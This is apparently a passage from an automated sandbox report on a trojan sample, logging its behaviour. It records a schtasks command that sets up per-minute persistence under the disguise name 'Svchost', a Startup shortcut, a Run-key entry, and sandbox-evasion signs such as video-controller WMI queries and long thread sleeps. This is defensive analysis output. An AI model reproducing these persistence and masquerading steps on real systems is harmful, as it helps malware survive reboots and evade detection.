                      Source: C:\Users\user\AppData\Roaming\X.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe
                      Source: C:\Users\user\AppData\Roaming\X.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Svchost.lnkJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Svchost.lnkJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SvchostJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SvchostJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeMemory allocated: 1050000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeMemory allocated: 1ACD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeMemory allocated: 1090000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeMemory allocated: 1AB90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeWindow / User API: threadDelayed 815Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeWindow / User API: threadDelayed 9020Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe TID: 1528Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exe TID: 2288Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exe TID: 6312Thread sleep count: 815 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exe TID: 6312Thread sleep count: 9020 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
